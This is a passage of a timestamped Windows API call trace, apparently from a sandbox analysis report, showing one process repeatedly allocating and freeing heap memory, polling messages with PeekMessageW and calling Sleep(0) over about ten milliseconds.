out: hHeap=0xbc0000) returned 1 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.538] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.538] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.538] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.538] Sleep (dwMilliseconds=0x0) [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.538] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.539] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.539] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.539] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.539] Sleep (dwMilliseconds=0x0) [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.539] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.540] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.540] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.540] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.540] Sleep (dwMilliseconds=0x0) [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.540] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.542] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.542] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.542] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.542] Sleep (dwMilliseconds=0x0) [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.543] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.543] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.543] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.543] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.543] Sleep (dwMilliseconds=0x0) [0259.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.544] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.544] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.544] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.544] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.544] Sleep (dwMilliseconds=0x0) [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.545] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.545] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.545] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.545] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.545] Sleep (dwMilliseconds=0x0) [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.546] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.546] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.546] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.546] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.546] Sleep (dwMilliseconds=0x0) [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.547] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.547] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.547] Sleep (dwMilliseconds=0x0) [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.547] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.548] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.548] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.548] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.548] Sleep (dwMilliseconds=0x0) [0259.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.548] HeapFree (in: 